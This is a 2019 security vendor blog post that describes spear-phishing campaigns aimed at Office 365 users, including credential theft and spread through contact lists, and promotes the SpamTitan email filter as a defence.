Phishing Attackers Targeting Microsoft Office 365 Email Users

Posted by Geraldine Hunt on Thu, Aug 8th, 2019

Any email administrator is aware of the dangers of phishing, but it's only when an organization is specifically targeted that it can get serious. Random phishing attacks are usually caught by email filters, but spear phishing attacks are much more sophisticated and use employee background data to avoid filters and provide a higher level of ROI for the attacker. An attacker can spend days (weeks even) collecting data on employees and use this information to email them directly. With the right attack technique, an attacker can walk away with gigabytes of intellectual data, customer and employee sensitive information, and important documents worth cash to your competitors.

Office 365 is a Treasure Trove for Attackers

Recently, attackers have focused directly on Office 365 users. Office 365 offers enterprise email using Microsoft Exchange servers, but it's a habit for administrators to use credentials across several facets of Office 365 including One Drive, Skype, SharePoint, and Office Store. Internally, this doesn't pose an issue but should an attacker gain access to a user's credentials through a spear-phishing campaign, the attacker would then have access to several other resources.

In a recent 2017 phishing attack, Office 365 users were targeted mainly for their email credentials. Attackers know that only a small percentage of users will fall for an unsolicited email from a stranger, but users trust people on their contact list implicitly. The campaign focused on stealing email credentials and then sending an email with a malicious HTML document attached. The attacker sent the malicious attachment to people on the victim's contact list. The email comes from a user that dozens of other users know, so the attacker has a better chance of stealing user credentials. This type of sophisticated attack is nothing new, but focusing on Office 365 users gives an attacker a better chance of accessing sensitive data.

To take the attack a step further, attackers used the victim's Skype credentials to log into a profile and send a malicious file to targets on the victim's contact list. Using this spear phishing method targeting Office 365 users, attackers were able to expand the attack from a few dozen targets to hundreds of people. It only takes a few good targets and an attacker can download any number of intellectual property documents, enterprise secrets, employee and customer financial data, and numerous other files that could pose a huge risk to the integrity of the organization.

Office 365 Phishing Campaign

The lures used in the widespread 2017 phishing attack included fraudulent notifications of low disk space and requests to review a document on DocuSign. In both of these attacks, the user is prompted for their Office 365 credentials.  Subject lines include "FYI," "Approved Invoice," or "Fw: Payments." Once the user enters their Office 365 credentials, the attacker uses them to send more messages to send additional phishing emails to business contacts on the user's account contact list.

Zero-Day Attacks Pose the Greatest Risk

Many email filtering and security application deal with known malware used in phishing attacks, but it's much more difficult to detect zero-day attacks. Zero-day attacks are campaigns and malware that haven't been seen in the wild yet. Antivirus software depends greatly on signature files of known attacks, but zero-day attacks have no known signature. With emails, it's even more difficult to avoid false positives while still defending the internal system from successful phishing attacks. False positives create hassles for the user and can affect productivity, but filtering email is the most efficient way of blocking these attacks from ever reaching the recipient's inbox.

The Exchange administrator needs a secure email solution that uses advanced algorithms that can predict zero-day attacks. This is a combination of checking attachments, analyzing content, anti-typosquatting, link protection, and encryption. All of these protections combined provide a comprehensive anti-phishing and anti-malware solution dedicated to email protection. Because Microsoft Exchange integrates with a Windows network environment, the solution must also work with Active Directory and LDAP.

Basic Email Filters are Not Enough

Phishing attacks continue to increase and adopt new tactics – and spam is increasing accordingly. In the second quarter of 2018, the amount of spam peaked in May up to 51 percent; the average amount of spam in email traffic worldwide was 50 percent.

Old email filters checked for specific words in the title, a specific sender or phrases found in the content to identify issues, but this method is no longer sufficient. Phishing attackers have an arsenal of techniques that bypass these traditional methods of spam and anti-malware software. Besides security awareness training, organizations using Office 365 must implement 3rd party, next level email filters that analyze content, implement layers of filtering to determine if an email or link within an email could be malicious.

With the SpamTitan Email Filter, you provide a dedicated mail gateway that fully protects your Exchange server and every recipient within the organization. SpamTitan provides phishing protection to prevent whaling and spear phishing by scanning all inbound email in real-time. SpamTitan searches for key indicators in the email header, domain information, and content. SpamTitan also performs reputation analysis on all links (including shortened URLs) contained in emails and block malicious emails before being delivered to the end user. How SpamTitan protects from phishing attempts:

• URL reputation analysis during scanning against multiple reputations.
• Detect and block malicious spear-phishing emails with either existing or new malware.
• Heuristic rules to detect phishing based on message headers et al. These are updated frequently to address new threats.
• Easy synchronization with Active Directory and LDAP.
• Spam Confidence Levels can be applied by user, user-group and domain.
• Whitelisting or blacklisting senders/IP addresses.
• Infinitely scalable and universally compatible.

The combination of these features ensures SpamTitan protects Office365 users and businesses from spear phishing, business email compromise (BEC), and cyber fraud. System Administrators implementing Office 365 need to make sure it’s secure by layering in a dedicated secure messaging and spam filtering solution like SpamTitan to protect against advanced persistent threats. To protect against advanced threats you need advanced protection.

Take a closer look at SpamTitan today – sign up for a free demo at a time that suits you.

More free Office 365 email security resources here:

1. SpamTitan for Office 365

2. Protecting Microsoft Office 365 from Cyber Attacks   

3. Phishing attackers targeting Office 365 Business Emails 

4. Filling the email security gap in Office 365 

5. The latest phishing and spoofing attack getting through microsoft office 365 

6. Improve the spam filter for Office 365 

7. Spamtitan Spam filtering with microsoft office 365